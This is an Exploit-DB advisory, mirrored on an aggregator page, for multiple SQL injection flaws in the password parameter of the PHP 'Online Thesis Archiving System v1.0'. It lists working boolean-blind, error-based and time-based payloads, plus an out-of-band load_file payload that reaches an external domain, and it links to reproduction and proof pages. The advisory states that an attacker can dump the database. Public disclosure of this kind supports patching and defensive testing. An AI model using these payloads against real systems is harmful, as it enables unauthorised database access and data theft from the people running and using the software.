Online Thesis Archiving System v1.0 – Multiple-SQLi

• Exploit Database
• 15 阅读

• 作者： nu11secur1ty
  日期： 2023-06-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51521/

• ## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
  ## Author: nu11secur1ty
  ## Date: 06.12.2023
  ## Vendor: https://github.com/oretnom23
  ## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
  ## Reference: https://portswigger.net/web-security/sql-injection
  
  ## Description:
  The password parameter appears to be vulnerable to SQL injection
  attacks. The payload '+(select
  load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
  was submitted in the password parameter.
  This payload injects a SQL sub-query that calls MySQL's load_file
  function with a UNC file path that references a URL on an external
  domain. The application interacted with that domain, indicating that
  the injected SQL query was executed. The attacker can dump all
  information from the
  database of this system, and then he can use it for dangerous and
  malicious purposes!
  
  STATUS: HIGH-CRITICAL Vulnerability
  
  [+]Payload:
  ```mysql
  ---
  Parameter: password (POST)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
  Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
  OR NOT 1404=1404-- Eotr
  
  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
  GROUP BY clause (FLOOR)
  Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
  AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
  (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
  AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
  ---
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)
  
  ## Proof and Exploit:
  [href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)
  
  ## Time spend:
  01:15:00
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
  https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html
  https://cxsecurity.com/ and https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>